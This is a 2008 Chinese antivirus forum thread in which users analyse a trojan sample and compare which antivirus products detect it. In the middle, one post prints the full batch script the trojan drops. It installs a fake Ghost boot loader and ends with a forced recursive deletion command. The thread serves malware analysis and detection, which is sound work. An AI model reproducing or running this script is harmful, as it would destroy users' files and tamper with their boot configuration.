卡饭论坛 » 病毒样本区 » 超级巡警抓到的样本

水晶 发表于 2008-8-19 07:58

超级巡警抓到的样本

发现病毒:Trojan.BAT.KillFiles.ev  处理结果:清除成功   描述:特洛伊木马  文件路径:"C:\WINDOWS\Temp\yjhy\setup.exe"

kikyo9527 发表于 2008-8-19 08:20

干掉

lg560852 发表于 2008-8-19 08:25

这个有啥行为没？
在线分析就报了一木马，然后创建了2个文件夹，完了
[url=http://www.threatexpert.com/repo ... b4fa248dd9977d85768]http://www.threatexpert.com/repo ... b4fa248dd9977d85768[/url]
倒是，这个病毒的图标很好看

[[i] 本帖最后由 lg560852 于 2008-8-19 08:28 编辑 [/i]]

syfwxmh 发表于 2008-8-19 08:38

TOKL

忧郁浪子 发表于 2008-8-19 09:16

[code]2008-08-19 09:13:10    运行应用程序      操作:阻止
进程路径:F:\virus\setup\setup.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\1520093.bat  
触发规则:所有程序规则->禁止该位置->%windir%\*
[/code]

[color=#ff0000]1520093.bat内容如下：[/color]

[code]@Echo Off
Copy /y windows\*.* c:\windows >nul
nt.exe
;Echo 程序正在运行,请稍等,12秒钟后自动重启电脑...
sleep 12
If Exist c:\boot\ghos. rd /s /q c:\boot\ghos
If Exist c:\GHLDR attrib -r -s -h c:\GHLDR
If Exist c:\GHLDR Del GHLDR
md c:\boot\ghos
Copy PQVF.VFD c:\boot\ghos\dos.img >nul
Copy menu.lst c:\boot\ghos\ >nul
Copy GHLDR c:\ >nul
Copy IMG.exe c:\boot\ghos >nul
Del IMG.exe
Cd\
c:
Cd c:\boot\ghos
Echo cdqd >cdqd.exe
IMG A dos.img cdqd.exe
Del IMG.exe
Del cdqd.exe
Del /f /s /q .[/code]

fireworld 发表于 2008-8-19 10:39

破坏dos工具箱的？

kkgh 发表于 2008-8-19 10:42

诺顿杀

cruiyong 发表于 2008-8-19 12:34

有这些动作

有这些动作

luxiao200888 发表于 2008-8-19 13:01

TR/Horse.HK Trojan

龙城小武 发表于 2008-8-19 13:08

卡巴2009过了

qigang 发表于 2008-8-19 13:13

2/1

瑞星病毒查杀结果报告

清除病毒种类列表：

病毒： Backdoor.Win32.CAK.a     

MAC 地址：00:11:5B:F3:6D:69

用户来源：互联网

软件版本：20.58.10

BING126 发表于 2008-8-19 21:03

McAfee  miss

allinwonderi 发表于 2008-8-19 22:21

F-Prot 4.4.4

<W32/Trojan2.NPD (确切, not disinfectable)>        C:\Download Files\setup.rar->setup.exe

查看完整版本: 超级巡警抓到的样本